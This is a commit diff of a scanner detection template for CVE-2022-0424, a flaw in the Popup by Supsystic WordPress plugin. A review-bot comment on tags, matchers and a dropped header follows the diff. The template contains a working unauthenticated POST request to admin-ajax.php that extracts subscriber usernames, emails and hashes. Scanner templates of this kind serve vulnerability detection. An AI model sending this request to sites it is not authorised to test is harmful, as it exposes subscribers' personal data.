updated matchers, info & req type

patch-1
Ritik Chaddha 2024-04-11 10:10:31 +05:30 committed by GitHub
parent ea437826b6
commit 97864a8e5f
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 23 additions and 20 deletions


@ -1,13 +1,14 @@
id: CVE-2022-0424 id: CVE-2022-0424
info: info:
name: Popup by Supsystic < 1.10.9 - Unauthenticated Subscriber Email Addresses Disclosure name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
author: Kazgangap author: Kazgangap
severity: medium severity: medium
description: | description: |
The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0424
- https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/ - https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0424
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3 cvss-score: 5.3
@ -17,32 +18,34 @@ info:
epss-percentile: 0.34103 epss-percentile: 0.34103
cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
metadata: metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/popup-by-supsystic"
vendor: supsystic vendor: supsystic
product: popup product: popup
framework: wordpress framework: wordpress
tags: wpscan tags: cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup
http: http:
- method: POST - raw:
path: - |
- "{{BaseURL}}/wp-admin/admin-ajax.php" POST /wp-admin/admin-ajax.php HTTP/1.1
headers: Host: {{Hostname}}
Content-Length: "104" Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: "application/json, text/javascript, */*; q=0.01"
X-Requested-With: "XMLHttpRequest" page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
Accept-Encoding: "gzip, deflate"
Accept-Language: "en-US,en;q=0.9"
Connection: "close"
body: |
page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- '"id":"1","username"' - '"id":"'
- 'email' - 'username":"'
- 'hash' - 'email":'
- 'hash":"'
- '_wpnonce'
condition: and
- type: status - type: status
status: status:
- 200 - 200
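Review bot: The rewritten `tags:` line drops `wpscan`, although the template's only advisory reference is still the wpscan entry, so the template falls out of the `-tags wpscan` selection the previous version was in; the usual form keeps both, `tags: cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,wpscan`. The word matcher now runs with `condition: and` and adds `'_wpnonce'`, a token the old matcher never required, so any target whose `getListForTbl` JSON lacks it will go unmatched even when subscriber emails are returned; the `verified: true` run should confirm that string is present in the response, or the `_wpnonce` entry should be dropped and the `"id":"` / `email":` / `hash":"` words kept as the disclosure signal. The raw request also omits the `X-Requested-With: XMLHttpRequest` header the old block sent; if the plugin gates the AJAX action on it this would be a silent false negative, so worth checking against the verified host.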